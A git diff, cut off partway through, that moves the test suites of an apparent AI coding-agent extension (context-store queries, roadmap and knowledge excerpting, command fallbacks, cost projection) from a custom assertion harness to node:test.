-console.log('\n=== context-store: query requirements by slice ===');
-{
-  openDatabase(':memory:');
+    const s01 = queryRequirements({ sliceId: 'S01' });
+    assert.strictEqual(s01.length, 2, 'slice filter S01 returns 2 (primary + supporting)');
+    const s01ids = s01.map(r => r.id).sort();
+    assert.deepStrictEqual(s01ids, ['R001', 'R002'], 'S01 owns R001 and supports R002');
 
-  insertRequirement({
-    id: 'R001', class: 'functional', status: 'active',
-    description: 'req A', why: 'w', source: 'M001', primary_owner: 'S01',
-    supporting_slices: '', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
-  });
-  insertRequirement({
-    id: 'R002', class: 'functional', status: 'active',
-    description: 'req B', why: 'w', source: 'M001', primary_owner: 'S02',
-    supporting_slices: 'S01', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
-  });
-  insertRequirement({
-    id: 'R003', class: 'functional', status: 'active',
-    description: 'req C', why: 'w', source: 'M001', primary_owner: 'S03',
-    supporting_slices: '', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
+    const s03 = queryRequirements({ sliceId: 'S03' });
+    assert.strictEqual(s03.length, 1, 'slice filter S03 returns 1');
+    assert.strictEqual(s03[0]?.id, 'R003', 'S03 owns R003');
   });
 
-  const s01 = queryRequirements({ sliceId: 'S01' });
-  assertEq(s01.length, 2, 'slice filter S01 returns 2 (primary + supporting)');
-  const s01ids = s01.map(r => r.id).sort();
-  assertEq(s01ids, ['R001', 'R002'], 'S01 owns R001 and supports R002');
+  test("query requirements by status", () => {
+    openDatabase(':memory:');
 
-  const s03 = queryRequirements({ sliceId: 'S03' });
-  assertEq(s03.length, 1, 'slice filter S03 returns 1');
-  assertEq(s03[0]?.id, 'R003', 'S03 owns R003');
+    insertRequirement({
+      id: 'R001', class: 'functional', status: 'active',
+      description: 'req A', why: 'w', source: 'M001', primary_owner: 'S01',
+      supporting_slices: '', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
+    insertRequirement({
+      id: 'R002', class: 'functional', status: 'validated',
+      description: 'req B', why: 'w', source: 'M001', primary_owner: 'S01',
+      supporting_slices: '', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
+    insertRequirement({
+      id: 'R003', class: 'functional', status: 'deferred',
+      description: 'req C', why: 'w', source: 'M001', primary_owner: 'S01',
+      supporting_slices: '', validation: 'v', notes: '', full_content: '',
+      superseded_by: null,
+    });
 
-  closeDatabase();
-}
+    const active = queryRequirements({ status: 'active' });
+    assert.strictEqual(active.length, 1, 'status filter active returns 1');
+    assert.strictEqual(active[0]?.id, 'R001', 'active returns R001');
 
-console.log('\n=== context-store: query requirements by status ===');
-{
-  openDatabase(':memory:');
-
-  insertRequirement({
-    id: 'R001', class: 'functional', status: 'active',
-    description: 'req A', why: 'w', source: 'M001', primary_owner: 'S01',
-    supporting_slices: '', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
+    const validated = queryRequirements({ status: 'validated' });
+    assert.strictEqual(validated.length, 1, 'status filter validated returns 1');
+    assert.strictEqual(validated[0]?.id, 'R002', 'validated returns R002');
   });
-  insertRequirement({
-    id: 'R002', class: 'functional', status: 'validated',
-    description: 'req B', why: 'w', source: 'M001', primary_owner: 'S01',
-    supporting_slices: '', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
-  });
-  insertRequirement({
-    id: 'R003', class: 'functional', status: 'deferred',
-    description: 'req C', why: 'w', source: 'M001', primary_owner: 'S01',
-    supporting_slices: '', validation: 'v', notes: '', full_content: '',
-    superseded_by: null,
-  });
-
-  const active = queryRequirements({ status: 'active' });
-  assertEq(active.length, 1, 'status filter active returns 1');
-  assertEq(active[0]?.id, 'R001', 'active returns R001');
-
-  const validated = queryRequirements({ status: 'validated' });
-  assertEq(validated.length, 1, 'status filter validated returns 1');
-  assertEq(validated[0]?.id, 'R002', 'validated returns R002');
-
-  closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: format decisions
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: formatDecisionsForPrompt ===');
-{
-  const empty = formatDecisionsForPrompt([]);
-  assertEq(empty, '', 'empty input returns empty string');
+describe("context-store: formatDecisionsForPrompt", () => {
+  test("empty input returns empty string", () => {
+    const empty = formatDecisionsForPrompt([]);
+    assert.strictEqual(empty, '', 'empty input returns empty string');
+  });
 
-  const result = formatDecisionsForPrompt([
-    {
-      seq: 1, id: 'D001', when_context: 'M001/S01', scope: 'architecture',
-      decision: 'use SQLite', choice: 'node:sqlite', rationale: 'built-in',
-      revisable: 'yes', made_by: 'agent', superseded_by: null,
-    },
-    {
-      seq: 2, id: 'D002', when_context: 'M001/S02', scope: 'performance',
-      decision: 'use WAL', choice: 'WAL', rationale: 'concurrent',
-      revisable: 'no', made_by: 'human', superseded_by: null,
-    },
-  ]);
+  test("formats decisions as markdown table", () => {
+    const result = formatDecisionsForPrompt([
+      {
+        seq: 1, id: 'D001', when_context: 'M001/S01', scope: 'architecture',
+        decision: 'use SQLite', choice: 'node:sqlite', rationale: 'built-in',
+        revisable: 'yes', made_by: 'agent', superseded_by: null,
+      },
+      {
+        seq: 2, id: 'D002', when_context: 'M001/S02', scope: 'performance',
+        decision: 'use WAL', choice: 'WAL', rationale: 'concurrent',
+        revisable: 'no', made_by: 'human', superseded_by: null,
+      },
+    ]);
 
-  // Should be a markdown table
-  assertMatch(result, /^\| # \| When \| Scope/, 'has table header');
-  assertMatch(result, /\|---\|/, 'has separator row');
-  assertMatch(result, /\| D001 \|/, 'has D001 row');
-  assertMatch(result, /\| D002 \|/, 'has D002 row');
-  const lines = result.split('\n');
-  assertEq(lines.length, 4, 'table has 4 lines (header + separator + 2 rows)');
-}
+    // Should be a markdown table
+    assert.match(result, /^\| # \| When \| Scope/, 'has table header');
+    assert.match(result, /\|---\|/, 'has separator row');
+    assert.match(result, /\| D001 \|/, 'has D001 row');
+    assert.match(result, /\| D002 \|/, 'has D002 row');
+    const lines = result.split('\n');
+    assert.strictEqual(lines.length, 4, 'table has 4 lines (header + separator + 2 rows)');
+  });
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: format requirements
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: formatRequirementsForPrompt ===');
-{
-  const empty = formatRequirementsForPrompt([]);
-  assertEq(empty, '', 'empty input returns empty string');
+describe("context-store: formatRequirementsForPrompt", () => {
+  test("empty input returns empty string", () => {
+    const empty = formatRequirementsForPrompt([]);
+    assert.strictEqual(empty, '', 'empty input returns empty string');
+  });
 
-  const result = formatRequirementsForPrompt([
-    {
-      id: 'R001', class: 'functional', status: 'active',
-      description: 'System must persist decisions', why: 'agent memory',
-      source: 'M001', primary_owner: 'S01', supporting_slices: 'S02',
-      validation: 'roundtrip test', notes: 'high priority',
-      full_content: '', superseded_by: null,
-    },
-    {
-      id: 'R002', class: 'non-functional', status: 'active',
-      description: 'Sub-5ms query latency', why: 'prompt injection speed',
-      source: 'M001', primary_owner: 'S01', supporting_slices: '',
-      validation: 'timing test', notes: '',
-      full_content: '', superseded_by: null,
-    },
-  ]);
+  test("formats requirements as markdown sections", () => {
+    const result = formatRequirementsForPrompt([
+      {
+        id: 'R001', class: 'functional', status: 'active',
+        description: 'System must persist decisions', why: 'agent memory',
+        source: 'M001', primary_owner: 'S01', supporting_slices: 'S02',
+        validation: 'roundtrip test', notes: 'high priority',
+        full_content: '', superseded_by: null,
+      },
+      {
+        id: 'R002', class: 'non-functional', status: 'active',
+        description: 'Sub-5ms query latency', why: 'prompt injection speed',
+        source: 'M001', primary_owner: 'S01', supporting_slices: '',
+        validation: 'timing test', notes: '',
+        full_content: '', superseded_by: null,
+      },
+    ]);
 
-  assertMatch(result, /### R001: System must persist decisions/, 'has R001 section header');
-  assertMatch(result, /### R002: Sub-5ms query latency/, 'has R002 section header');
-  assertMatch(result, /\*\*Class:\*\* functional/, 'has class field');
-  assertMatch(result, /\*\*Status:\*\* active/, 'has status field');
-  assertMatch(result, /\*\*Supporting Slices:\*\* S02/, 'has supporting slices when present');
-  // R002 has no supporting_slices — should not have that line
-  // R002 has no notes — should not have notes line
-  const r002Section = result.split('### R002')[1] || '';
-  assertTrue(!r002Section.includes('**Supporting Slices:**'), 'no supporting slices line when empty');
-  assertTrue(!r002Section.includes('**Notes:**'), 'no notes line when empty');
-}
+    assert.match(result, /### R001: System must persist decisions/, 'has R001 section header');
+    assert.match(result, /### R002: Sub-5ms query latency/, 'has R002 section header');
+    assert.match(result, /\*\*Class:\*\* functional/, 'has class field');
+    assert.match(result, /\*\*Status:\*\* active/, 'has status field');
+    assert.match(result, /\*\*Supporting Slices:\*\* S02/, 'has supporting slices when present');
+    // R002 has no supporting_slices — should not have that line
+    // R002 has no notes — should not have notes line
+    const r002Section = result.split('### R002')[1] || '';
+    assert.ok(!r002Section.includes('**Supporting Slices:**'), 'no supporting slices line when empty');
+    assert.ok(!r002Section.includes('**Notes:**'), 'no notes line when empty');
+  });
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: sub-5ms timing assertion
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: sub-5ms query timing ===');
-{
-  openDatabase(':memory:');
+describe("context-store: sub-5ms query timing", () => {
+  afterEach(() => closeDatabase());
 
-  // Insert 50 decisions
-  for (let i = 1; i <= 50; i++) {
-    const id = `D${String(i).padStart(3, '0')}`;
-    insertDecision({
-      id,
-      when_context: `M00${(i % 3) + 1}/S0${(i % 5) + 1}`,
-      scope: i % 2 === 0 ? 'architecture' : 'performance',
-      decision: `decision ${i}`,
-      choice: `choice ${i}`,
-      rationale: `rationale ${i}`,
-      revisable: i % 3 === 0 ? 'no' : 'yes',
-      made_by: 'agent',
-      superseded_by: null,
-    });
-  }
+  test("queries complete under 5ms for 50+50 rows", () => {
+    openDatabase(':memory:');
 
-  // Insert 50 requirements
-  for (let i = 1; i <= 50; i++) {
-    const id = `R${String(i).padStart(3, '0')}`;
-    insertRequirement({
-      id,
-      class: i % 2 === 0 ? 'functional' : 'non-functional',
-      status: i % 4 === 0 ? 'validated' : 'active',
-      description: `requirement ${i}`,
-      why: `why ${i}`,
-      source: 'M001',
-      primary_owner: `S0${(i % 5) + 1}`,
-      supporting_slices: i % 3 === 0 ? 'S01, S02' : '',
-      validation: `validation ${i}`,
-      notes: '',
-      full_content: '',
-      superseded_by: null,
-    });
-  }
+    // Insert 50 decisions
+    for (let i = 1; i <= 50; i++) {
+      const id = `D${String(i).padStart(3, '0')}`;
+      insertDecision({
+        id,
+        when_context: `M00${(i % 3) + 1}/S0${(i % 5) + 1}`,
+        scope: i % 2 === 0 ? 'architecture' : 'performance',
+        decision: `decision ${i}`,
+        choice: `choice ${i}`,
+        rationale: `rationale ${i}`,
+        revisable: i % 3 === 0 ? 'no' : 'yes',
+        made_by: 'agent',
+        superseded_by: null,
+      });
+    }
 
-  // Time the queries — warm up first
-  queryDecisions();
-  queryRequirements();
+    // Insert 50 requirements
+    for (let i = 1; i <= 50; i++) {
+      const id = `R${String(i).padStart(3, '0')}`;
+      insertRequirement({
+        id,
+        class: i % 2 === 0 ? 'functional' : 'non-functional',
+        status: i % 4 === 0 ? 'validated' : 'active',
+        description: `requirement ${i}`,
+        why: `why ${i}`,
+        source: 'M001',
+        primary_owner: `S0${(i % 5) + 1}`,
+        supporting_slices: i % 3 === 0 ? 'S01, S02' : '',
+        validation: `validation ${i}`,
+        notes: '',
+        full_content: '',
+        superseded_by: null,
+      });
+    }
 
-  const start = performance.now();
-  const decisions = queryDecisions();
-  const requirements = queryRequirements();
-  const elapsed = performance.now() - start;
+    // Time the queries — warm up first
+    queryDecisions();
+    queryRequirements();
 
-  assertTrue(decisions.length === 50, `got ${decisions.length} decisions (expected 50)`);
-  assertTrue(requirements.length === 50, `got ${requirements.length} requirements (expected 50)`);
-  assertTrue(elapsed < 5, `query latency ${elapsed.toFixed(2)}ms should be < 5ms`);
-  console.log(`  timing: ${elapsed.toFixed(2)}ms for 50+50 row queries`);
+    const start = performance.now();
+    const decisions = queryDecisions();
+    const requirements = queryRequirements();
+    const elapsed = performance.now() - start;
 
-  closeDatabase();
-}
+    assert.strictEqual(decisions.length, 50, `got ${decisions.length} decisions (expected 50)`);
+    assert.strictEqual(requirements.length, 50, `got ${requirements.length} requirements (expected 50)`);
+    assert.ok(elapsed < 5, `query latency ${elapsed.toFixed(2)}ms should be < 5ms`);
+  });
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: queryArtifact
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: queryArtifact returns content for existing path ===');
-{
-  openDatabase(':memory:');
+describe("context-store: queryArtifact", () => {
+  afterEach(() => closeDatabase());
 
-  insertArtifact({
-    path: 'PROJECT.md',
-    artifact_type: 'project',
-    milestone_id: null,
-    slice_id: null,
-    task_id: null,
-    full_content: '# My Project\n\nProject description here.',
-  });
-  insertArtifact({
-    path: '.gsd/milestones/M001/M001-PLAN.md',
-    artifact_type: 'milestone_plan',
-    milestone_id: 'M001',
-    slice_id: null,
-    task_id: null,
-    full_content: '# M001 Plan\n\nMilestone content.',
+  test("returns content for existing path", () => {
+    openDatabase(':memory:');
+
+    insertArtifact({
+      path: 'PROJECT.md',
+      artifact_type: 'project',
+      milestone_id: null,
+      slice_id: null,
+      task_id: null,
+      full_content: '# My Project\n\nProject description here.',
+    });
+    insertArtifact({
+      path: '.gsd/milestones/M001/M001-PLAN.md',
+      artifact_type: 'milestone_plan',
+      milestone_id: 'M001',
+      slice_id: null,
+      task_id: null,
+      full_content: '# M001 Plan\n\nMilestone content.',
+    });
+
+    const project = queryArtifact('PROJECT.md');
+    assert.strictEqual(project, '# My Project\n\nProject description here.', 'queryArtifact returns full_content for PROJECT.md');
+
+    const plan = queryArtifact('.gsd/milestones/M001/M001-PLAN.md');
+    assert.strictEqual(plan, '# M001 Plan\n\nMilestone content.', 'queryArtifact returns full_content for milestone plan');
   });
 
-  const project = queryArtifact('PROJECT.md');
-  assertEq(project, '# My Project\n\nProject description here.', 'queryArtifact returns full_content for PROJECT.md');
+  test("returns null for missing path", () => {
+    openDatabase(':memory:');
 
-  const plan = queryArtifact('.gsd/milestones/M001/M001-PLAN.md');
-  assertEq(plan, '# M001 Plan\n\nMilestone content.', 'queryArtifact returns full_content for milestone plan');
+    const missing = queryArtifact('nonexistent.md');
+    assert.strictEqual(missing, null, 'queryArtifact returns null for path not in DB');
+  });
 
-  closeDatabase();
-}
+  test("returns null when DB unavailable", () => {
+    closeDatabase();
+    assert.ok(!isDbAvailable(), 'DB should not be available');
 
-console.log('\n=== context-store: queryArtifact returns null for missing path ===');
-{
-  openDatabase(':memory:');
-
-  const missing = queryArtifact('nonexistent.md');
-  assertEq(missing, null, 'queryArtifact returns null for path not in DB');
-
-  closeDatabase();
-}
-
-console.log('\n=== context-store: queryArtifact returns null when DB unavailable ===');
-{
-  closeDatabase();
-  assertTrue(!isDbAvailable(), 'DB should not be available');
-
-  const result = queryArtifact('PROJECT.md');
-  assertEq(result, null, 'queryArtifact returns null when DB closed');
-}
+    const result = queryArtifact('PROJECT.md');
+    assert.strictEqual(result, null, 'queryArtifact returns null when DB closed');
+  });
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // context-store: queryProject
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: queryProject returns PROJECT.md content ===');
-{
-  openDatabase(':memory:');
+describe("context-store: queryProject", () => {
+  afterEach(() => closeDatabase());
 
-  insertArtifact({
-    path: 'PROJECT.md',
-    artifact_type: 'project',
-    milestone_id: null,
-    slice_id: null,
-    task_id: null,
-    full_content: '# Test Project\n\nThis is the project description.',
+  test("returns PROJECT.md content", () => {
+    openDatabase(':memory:');
+
+    insertArtifact({
+      path: 'PROJECT.md',
+      artifact_type: 'project',
+      milestone_id: null,
+      slice_id: null,
+      task_id: null,
+      full_content: '# Test Project\n\nThis is the project description.',
+    });
+
+    const content = queryProject();
+    assert.strictEqual(content, '# Test Project\n\nThis is the project description.', 'queryProject returns PROJECT.md content');
   });
 
-  const content = queryProject();
-  assertEq(content, '# Test Project\n\nThis is the project description.', 'queryProject returns PROJECT.md content');
+  test("returns null when no PROJECT.md", () => {
+    openDatabase(':memory:');
 
-  closeDatabase();
-}
+    const content = queryProject();
+    assert.strictEqual(content, null, 'queryProject returns null when PROJECT.md not imported');
+  });
 
-console.log('\n=== context-store: queryProject returns null when no PROJECT.md ===');
-{
-  openDatabase(':memory:');
+  test("returns null when DB unavailable", () => {
+    closeDatabase();
+    assert.ok(!isDbAvailable(), 'DB should not be available');
 
-  const content = queryProject();
-  assertEq(content, null, 'queryProject returns null when PROJECT.md not imported');
+    const content = queryProject();
+    assert.strictEqual(content, null, 'queryProject returns null when DB closed');
+  });
+});
 
-  closeDatabase();
-}
+// ═══════════════════════════════════════════════════════════════════════════
+// context-store: formatRoadmapExcerpt
+// ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== context-store: queryProject returns null when DB unavailable ===');
-{
-  closeDatabase();
-  assertTrue(!isDbAvailable(), 'DB should not be available');
+describe("context-store: formatRoadmapExcerpt", () => {
+  // Sample roadmap content matching actual M005-ROADMAP.md format
+  const sampleRoadmap = `# M005: Tiered Context Injection
 
-  const content = queryProject();
-  assertEq(content, null, 'queryProject returns null when DB closed');
-}
+## Vision
+Refactor prompt builders to inject relevance-scoped context.
 
-// ─── Final Report ──────────────────────────────────────────────────────────
-report();
+## Slice Overview
+| ID | Slice | Risk | Depends | Done | After this |
+|----|-------|------|---------|------|------------|
+| S01 | Scope existing queries | low | — | ✅ | planSlice prompt scoped. |
+| S02 | KNOWLEDGE scoping | medium | S01 | ⬜ | KNOWLEDGE sections filtered. |
+| S03 | Measurement test | low | S02 | ⬜ | 40% reduction confirmed. |
+`;
+
+  test("S02 with S01 predecessor includes both rows", () => {
+    const result = formatRoadmapExcerpt(sampleRoadmap, 'S02', '.gsd/milestones/M005/M005-ROADMAP.md');
+
+    // Should have header
+    assert.match(result, /\| ID \| Slice \| Risk \| Depends \| Done \| After this \|/, 'has header row');
+    // Should have separator
+    assert.match(result, /\|----\|/, 'has separator row');
+    // Should have S01 predecessor
+    assert.match(result, /\| S01 \|/, 'has predecessor S01 row');
+    // Should have S02 target
+    assert.match(result, /\| S02 \|/, 'has target S02 row');
+    // Should have reference directive
+    assert.match(result, /See full roadmap:.*M005-ROADMAP\.md/, 'has reference directive');
+    // Should NOT have S03 (not relevant)
+    assert.ok(!result.includes('| S03 |'), 'does not include unrelated S03');
+  });
+
+  test("S01 with no predecessor includes only target row", () => {
+    const result = formatRoadmapExcerpt(sampleRoadmap, 'S01');
+
+    // Should have header + separator + S01 only
+    assert.match(result, /\| ID \| Slice \|/, 'has header row');
+    assert.match(result, /\| S01 \|/, 'has target S01 row');
+    // Should NOT have S02 or S03
+    assert.ok(!result.includes('| S02 |'), 'does not include S02');
+    assert.ok(!result.includes('| S03 |'), 'does not include S03');
+    // Should have reference
+    assert.match(result, /See full roadmap:/, 'has reference directive');
+
+    // Count rows: header + separator + S01 + blank + directive = 5 lines
+    const lines = result.split('\n');
+    assert.strictEqual(lines.length, 5, 'correct number of lines (no predecessor)');
+  });
+
+  test("missing slice returns empty string", () => {
+    const result = formatRoadmapExcerpt(sampleRoadmap, 'S99');
+
+    assert.strictEqual(result, '', 'missing slice returns empty string');
+  });
+
+  test("empty input returns empty string", () => {
+    assert.strictEqual(formatRoadmapExcerpt('', 'S01'), '', 'empty content returns empty');
+    assert.strictEqual(formatRoadmapExcerpt(sampleRoadmap, ''), '', 'empty sliceId returns empty');
+  });
+
+  test("handles table with various column formats", () => {
+    // Table with different spacing and content
+    const variantRoadmap = `# Milestone
+
+| ID | Slice | Risk | Depends | Done | After this |
+|:---|:------|:-----|:--------|:-----|:-----------|
+| S01 | First slice title | low | — | ✅ | First complete. |
+| S02 | Second longer slice title here | medium | S01 | ⬜ | Second working. |
+`;
+
+    const result = formatRoadmapExcerpt(variantRoadmap, 'S02');
+
+    assert.match(result, /\| S01 \|/, 'has predecessor with different spacing');
+    assert.match(result, /\| S02 \|/, 'has target with different spacing');
+    assert.match(result, /Second longer slice title/, 'preserves full slice title');
+  });
+
+  test("handles multiple dependencies by using first one", () => {
+    const multiDepRoadmap = `| ID | Slice | Risk | Depends | Done | After this |
+|----|-------|------|---------|------|------------|
+| S01 | First | low | — | ✅ | Done. |
+| S02 | Second | low | — | ✅ | Done. |
+| S03 | Third | medium | S01, S02 | ⬜ | Working. |
+`;
+
+    const result = formatRoadmapExcerpt(multiDepRoadmap, 'S03');
+
+    // Should include S01 (first dependency) and S03
+    assert.match(result, /\| S01 \|/, 'has first dependency S01');
+    assert.match(result, /\| S03 \|/, 'has target S03');
+    // S02 is also a dependency but we only include the first one
+    // (This is intentional to keep excerpts minimal)
+  });
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// context-store: queryKnowledge
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("context-store: queryKnowledge", () => {
+  // Sample KNOWLEDGE.md content
+  const sampleKnowledge = `# Project Knowledge
+
+## Database Patterns
+SQLite is used with WAL mode for concurrent reads.
+Always use prepared statements.
+
+More database details here.
+
+## API Design
+REST endpoints follow OpenAPI spec.
+Use versioned paths like /v1/resource.
+
+## Testing Guidelines
+Unit tests use node:test.
+Integration tests mock external services.
+`;
+
+  test("single keyword matches header", async () => {
+    const result = await queryKnowledge(sampleKnowledge, ['database']);
+
+    assert.match(result, /## Database Patterns/, 'includes matching section header');
+    assert.match(result, /SQLite is used with WAL mode/, 'includes section content');
+    // Should NOT include other sections
+    assert.ok(!result.includes('## API Design'), 'does not include non-matching API section');
+    assert.ok(!result.includes('## Testing Guidelines'), 'does not include non-matching Testing section');
+  });
+
+  test("multiple keywords match multiple sections", async () => {
+    const result = await queryKnowledge(sampleKnowledge, ['database', 'testing']);
+
+    assert.match(result, /## Database Patterns/, 'includes Database section');
+    assert.match(result, /## Testing Guidelines/, 'includes Testing section');
+    assert.ok(!result.includes('## API Design'), 'does not include API section');
+  });
+
+  test("no matches returns empty string", async () => {
+    const result = await queryKnowledge(sampleKnowledge, ['nonexistent']);
+
+    assert.strictEqual(result, '', 'no matches returns empty string per D020');
+  });
+
+  test("keyword in first paragraph matches", async () => {
+    const result = await queryKnowledge(sampleKnowledge, ['sqlite']);
+
+    // 'sqlite' appears in first paragraph of Database Patterns
+    assert.match(result, /## Database Patterns/, 'matches keyword in first paragraph');
+    assert.match(result, /SQLite is used/, 'includes the section with matching paragraph');
+  });
+
+  test("case-insensitive matching", async () => {
+    const result = await queryKnowledge(sampleKnowledge, ['DATABASE', 'API']);
+
+    assert.match(result, /## Database Patterns/, 'case-insensitive header match');
+    assert.match(result, /## API Design/, 'case-insensitive header match for API');
+  });
+
+  test("empty keywords returns empty string", async () => {
+    const result = await queryKnowledge(sampleKnowledge, []);
+
+    assert.strictEqual(result, '', 'empty keywords returns empty string');
+  });
+
+  test("empty content returns empty string", async () => {
+    const result = await queryKnowledge('', ['database']);
+
+    assert.strictEqual(result, '', 'empty content returns empty string');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/core-overlay-fallback.test.ts b/src/resources/extensions/gsd/tests/core-overlay-fallback.test.ts
new file mode 100644
index 000000000..a6c2dc6d9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/core-overlay-fallback.test.ts
@@ -0,0 +1,76 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+
+import { handleCoreCommand } from "../commands/handlers/core.ts";
+
+function makeCtx(customResult: unknown) {
+  const notices: Array<{ message: string; type?: string }> = [];
+  return {
+    hasUI: true,
+    ui: {
+      custom: async () => customResult,
+      notify: (message: string, type?: string) => {
+        notices.push({ message, type });
+      },
+    },
+    notices,
+  };
+}
+
+test("visualize only falls back when ctx.ui.custom() is unavailable", async () => {
+  const successCtx = makeCtx(true);
+  const success = await handleCoreCommand("visualize", successCtx as any);
+  assert.equal(success, true);
+  assert.equal(successCtx.notices.length, 0, "successful overlay close does not trigger fallback");
+
+  const fallbackCtx = makeCtx(undefined);
+  const fallback = await handleCoreCommand("visualize", fallbackCtx as any);
+  assert.equal(fallback, true);
+  assert.equal(fallbackCtx.notices.length, 1, "unavailable overlay triggers fallback warning");
+  assert.match(fallbackCtx.notices[0]!.message, /interactive terminal/i);
+});
+
+test("show-config only falls back when ctx.ui.custom() is unavailable", async () => {
+  const successCtx = makeCtx(true);
+  const success = await handleCoreCommand("show-config", successCtx as any);
+  assert.equal(success, true);
+  assert.equal(successCtx.notices.length, 0, "successful overlay close does not trigger fallback");
+
+  const fallbackCtx = makeCtx(undefined);
+  const fallback = await handleCoreCommand("show-config", fallbackCtx as any);
+  assert.equal(fallback, true);
+  assert.equal(fallbackCtx.notices.length, 1, "unavailable overlay triggers text fallback");
+  assert.match(fallbackCtx.notices[0]!.message, /GSD Configuration/);
+});
+
+test("model command resolves and persists exact provider-qualified selection", async () => {
+  const selectedModel = { provider: "openai", id: "gpt-5.4" };
+  let applied: typeof selectedModel | null = null;
+  const ctx = {
+    hasUI: true,
+    model: { provider: "anthropic", id: "claude-sonnet-4-6" },
+    modelRegistry: {
+      getAvailable: () => [
+        { provider: "anthropic", id: "claude-sonnet-4-6" },
+        selectedModel,
+      ],
+    },
+    ui: {
+      notify: (message: string, type?: string) => {
+        notices.push({ message, type });
+      },
+    },
+  } as any;
+  const notices: Array<{ message: string; type?: string }> = [];
+  const pi = {
+    setModel: async (model: typeof selectedModel) => {
+      applied = model;
+      return true;
+    },
+  } as any;
+
+  const handled = await handleCoreCommand("model openai/gpt-5.4", ctx, pi);
+  assert.equal(handled, true);
+  assert.deepEqual(applied, selectedModel);
+  assert.match(notices[0]!.message, /openai\/gpt-5\.4/);
+});
diff --git a/src/resources/extensions/gsd/tests/cost-projection.test.ts b/src/resources/extensions/gsd/tests/cost-projection.test.ts
index 216b40ad4..609a285ca 100644
--- a/src/resources/extensions/gsd/tests/cost-projection.test.ts
+++ b/src/resources/extensions/gsd/tests/cost-projection.test.ts
@@ -7,11 +7,12 @@
  * That failure confirms the test runs against real code. (T01 state)
  */
 
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
 import {
   type SliceAggregate,
   formatCostProjection,
 } from "../metrics.js";
-import { createTestContext } from './test-helpers.ts';
 
 // ─── Test helpers ─────────────────────────────────────────────────────────────
 
@@ -25,110 +26,95 @@ function makeSliceAggregate(sliceId: string, cost: number): SliceAggregate {
   };
 }
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── formatCostProjection ─────────────────────────────────────────────────────
 
-console.log("\n=== formatCostProjection ===");
+describe("formatCostProjection", () => {
 
-// 1. Zero completed slices → empty result
-{
-  const result = formatCostProjection([], 3);
-  assertEq(result.length, 0, "zero slices → empty array");
-}
+  test("zero completed slices → empty result", () => {
+    const result = formatCostProjection([], 3);
+    assert.strictEqual(result.length, 0, "zero slices → empty array");
+  });
 
-// 2. One slice → suppressed (need ≥2 to project reliably)
-{
-  const result = formatCostProjection([makeSliceAggregate("M001/S01", 0.10)], 3);
-  assertEq(result.length, 0, "one slice → suppressed (no projection shown)");
-}
+  test("one slice → suppressed (need ≥2 to project reliably)", () => {
+    const result = formatCostProjection([makeSliceAggregate("M001/S01", 0.10)], 3);
+    assert.strictEqual(result.length, 0, "one slice → suppressed (no projection shown)");
+  });
 
-// 3. Two slices → projection shown (result.length > 0)
-{
-  const slices = [
-    makeSliceAggregate("M001/S01", 0.10),
-    makeSliceAggregate("M001/S02", 0.10),
-  ];
-  const result = formatCostProjection(slices, 5);
-  assertTrue(result.length > 0, "two slices → projection shown");
-}
+  test("two slices → projection shown", () => {
+    const slices = [
+      makeSliceAggregate("M001/S01", 0.10),
+      makeSliceAggregate("M001/S02", 0.10),
+    ];
+    const result = formatCostProjection(slices, 5);
+    assert.ok(result.length > 0, "two slices → projection shown");
+  });
 
-// 4. Two-slice result: result[0] contains "$" (cost is formatted)
-{
-  const slices = [
-    makeSliceAggregate("M001/S01", 0.10),
-    makeSliceAggregate("M001/S02", 0.10),
-  ];
-  const result = formatCostProjection(slices, 5);
-  assertTrue(result.length > 0 && result[0].includes("$"), "projection line contains \"$\"");
-}
+  test("two-slice result contains $ (cost is formatted)", () => {
+    const slices = [
+      makeSliceAggregate("M001/S01", 0.10),
+      makeSliceAggregate("M001/S02", 0.10),
+    ];
+    const result = formatCostProjection(slices, 5);
+    assert.ok(result.length > 0 && result[0].includes("$"), "projection line contains \"$\"");
+  });
 
-// 5. Budget ceiling hit: total $0.20 >= ceiling $0.05 → line contains "ceiling"
-{
-  const slices = [
-    makeSliceAggregate("M001/S01", 0.10),
-    makeSliceAggregate("M001/S02", 0.10),
-  ];
-  const result = formatCostProjection(slices, 5, 0.05);
-  const hasCeilingLine = result.some(
-    line => line.toLowerCase().includes("ceiling")
-  );
-  assertTrue(hasCeilingLine, "ceiling warning appears when total ($0.20) >= ceiling ($0.05)");
-}
+  test("budget ceiling hit: total >= ceiling → line contains ceiling", () => {
+    const slices = [
+      makeSliceAggregate("M001/S01", 0.10),
+      makeSliceAggregate("M001/S02", 0.10),
+    ];
+    const result = formatCostProjection(slices, 5, 0.05);
+    const hasCeilingLine = result.some(
+      line => line.toLowerCase().includes("ceiling")
+    );
+    assert.ok(hasCeilingLine, "ceiling warning appears when total ($0.20) >= ceiling ($0.05)");
+  });
 
-// 6. Budget ceiling not hit: total $0.20 < ceiling $100.00 → no ceiling line
-{
-  const slices = [
-    makeSliceAggregate("M001/S01", 0.10),
-    makeSliceAggregate("M001/S02", 0.10),
-  ];
-  const result = formatCostProjection(slices, 5, 100.00);
-  const hasCeilingLine = result.some(
